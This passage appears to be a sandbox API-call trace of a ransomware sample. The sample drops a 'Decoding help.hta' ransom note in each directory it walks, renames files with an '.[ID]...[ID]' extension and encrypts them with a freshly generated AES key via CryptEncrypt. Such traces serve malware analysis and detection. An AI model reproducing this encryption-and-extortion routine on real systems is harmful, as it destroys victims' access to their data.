[0056.273] WriteFile (in: hFile=0x714, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xb18fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xb18fcf8*=0x500, lpOverlapped=0x0) returned 1 [0057.495] CloseHandle (hObject=0x714) returned 1 [0057.495] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0057.495] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xb18fd30 | out: lpFindFileData=0xb18fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0057.495] lstrcpyW (in: lpString1=0x2a8a87f0, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" [0057.495] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0057.495] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0057.495] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0057.495] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WordMUI.xml") returned -1 [0057.495] lstrlenW (lpString="WordMUI.xml") returned 11 [0057.496] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" [0057.496] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0057.496] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpString2="WordMUI.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" [0057.496] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" [0057.496] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0057.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.496] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x714 [0057.497] CreateFileMappingA (hFile=0x714, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x97c [0057.497] CryptAcquireContextA (in: phProv=0xb18fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb18fcec*=0x344a2c0) returned 1 [0060.146] CryptGenKey (in: hProv=0x344a2c0, Algid=0x6610, dwFlags=0x1, phKey=0xb18fce8 | out: phKey=0xb18fce8*=0x5d7e90) returned 1 [0060.146] CryptExportKey (in: hKey=0x5d7e90, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb18fbe4, pdwDataLen=0xb18fce4 | out: pbData=0xb18fbe4*, pdwDataLen=0xb18fce4*=0x2c) returned 1 [0060.146] MapViewOfFile (hFileMappingObject=0x97c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x2d0000 [0063.838] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb18fbe4*, pdwDataLen=0xb18fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xb18fbe4*, pdwDataLen=0xb18fcf8*=0x100) returned 1 [0063.838] CryptEncrypt (in: hKey=0x5d7e90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0xb18fce4*=0x700, dwBufLen=0x700 | out: pbData=0x2d0000*, pdwDataLen=0xb18fce4*=0x700) returned 1 [0063.838] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0063.841] CloseHandle (hObject=0x97c) returned 1 [0063.841] CryptDestroyKey (hKey=0x5d7e90) returned 1 [0063.841] CryptReleaseContext (hProv=0x344a2c0, dwFlags=0x0) returned 1 [0063.841] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.841] WriteFile (in: hFile=0x714, lpBuffer=0xb18fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xb18fcf8, lpOverlapped=0x0 | out: lpBuffer=0xb18fbe4*, lpNumberOfBytesWritten=0xb18fcf8*=0x100, lpOverlapped=0x0) returned 1 [0063.842] WriteFile (in: hFile=0x714, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xb18fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xb18fcf8*=0x500, lpOverlapped=0x0) returned 1 [0063.842] CloseHandle (hObject=0x714) returned 1 [0063.842] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0063.842] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xb18fd30 | out: lpFindFileData=0xb18fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 0 [0063.842] FindClose (in: hFindFile=0x5a5770 | out: hFindFile=0x5a5770) returned 1 Thread: id = 120 os_tid = 0x444 [0040.149] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*.*", lpFindFileData=0xb2cfd30 | out: lpFindFileData=0xb2cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5770 [0040.149] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.149] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xb2cfd30 | out: lpFindFileData=0xb2cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.149] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.149] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.149] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xb2cfd30 | out: lpFindFileData=0xb2cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0040.149] lstrcmpW (lpString1=".", lpString2="10.0") returned -1 [0040.149] lstrcmpW (lpString1="..", lpString2="10.0") returned -1 [0040.149] lstrcmpiW (lpString1="windows", lpString2="10.0") returned 1 [0040.151] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*.*" [0040.151] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*.*") returned 36 [0040.151] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\", lpString2="10.0" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0" [0040.151] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*.*" [0040.151] GlobalMemoryStatus (in: lpBuffer=0xb2cfd10 | out: lpBuffer=0xb2cfd10) [0040.151] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10b8e3e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x220 [0040.152] CloseHandle (hObject=0x220) returned 1 [0040.152] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xb2cfd30 | out: lpFindFileData=0xb2cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0040.152] FindClose (in: hFindFile=0x5a5770 | out: hFindFile=0x5a5770) returned 1 Thread: id = 121 os_tid = 0x7e8 [0040.153] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*", lpFindFileData=0x454fd30 | out: lpFindFileData=0x454fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xaa276ca7, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f05f082, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5770 [0040.153] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.154] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x454fd30 | out: lpFindFileData=0x454fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xaa276ca7, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f05f082, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.154] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.154] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.154] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x454fd30 | out: lpFindFileData=0x454fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVDMaker.exe.mui", cAlternateFileName="")) returned 1 [0040.154] lstrcpyW (in: lpString1=0x10ba6450, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*" [0040.154] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*") returned 40 [0040.154] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\Decoding help.hta" [0040.154] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\en-us\\decoding help.hta")) returned 0xffffffff [0040.154] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0040.751] WriteFile (in: hFile=0x304, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x454fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x454fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.752] CloseHandle (hObject=0x304) returned 1 [0040.752] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.028] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DVDMaker.exe.mui") returned -1 [0041.028] lstrlenW (lpString="DVDMaker.exe.mui") returned 16 [0041.028] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*" [0041.028] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*") returned 40 [0041.028] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\", lpString2="DVDMaker.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui" [0041.028] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui" [0041.028] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\dvdmaker.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\en-us\\dvdmaker.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.028] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x454fd30 | out: lpFindFileData=0x454fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="OmdProject.dll.mui", cAlternateFileName="")) returned 1 [0041.028] lstrcpyW (in: lpString1=0x10ba6450, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*" [0041.028] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*") returned 40 [0041.028] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\Decoding help.hta" [0041.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\en-us\\decoding help.hta")) returned 0x1 [0041.028] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OmdProject.dll.mui") returned -1 [0041.028] lstrlenW (lpString="OmdProject.dll.mui") returned 18 [0041.028] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*" [0041.028] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*") returned 40 [0041.029] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\", lpString2="OmdProject.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui" [0041.029] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui" [0041.029] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\omdproject.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\en-us\\omdproject.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.038] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x454fd30 | out: lpFindFileData=0x454fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMM2CLIP.dll.mui", cAlternateFileName="")) returned 1 [0041.039] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*" [0041.039] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*") returned 40 [0041.039] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\Decoding help.hta" [0041.039] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\en-us\\decoding help.hta")) returned 0x1 [0041.039] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMM2CLIP.dll.mui") returned -1 [0041.039] lstrlenW (lpString="WMM2CLIP.dll.mui") returned 16 [0041.039] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*" [0041.039] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*") returned 40 [0041.039] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\", lpString2="WMM2CLIP.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui" [0041.039] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui" [0041.039] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.039] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\wmm2clip.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\en-us\\wmm2clip.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.039] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x454fd30 | out: lpFindFileData=0x454fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMM2CLIP.dll.mui", cAlternateFileName="")) returned 0 [0041.039] FindClose (in: hFindFile=0x5a5770 | out: hFindFile=0x5a5770) returned 1 Thread: id = 122 os_tid = 0x7e0 [0040.155] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8450 [0041.758] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.758] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.759] lstrcmpW (lpString1=".", 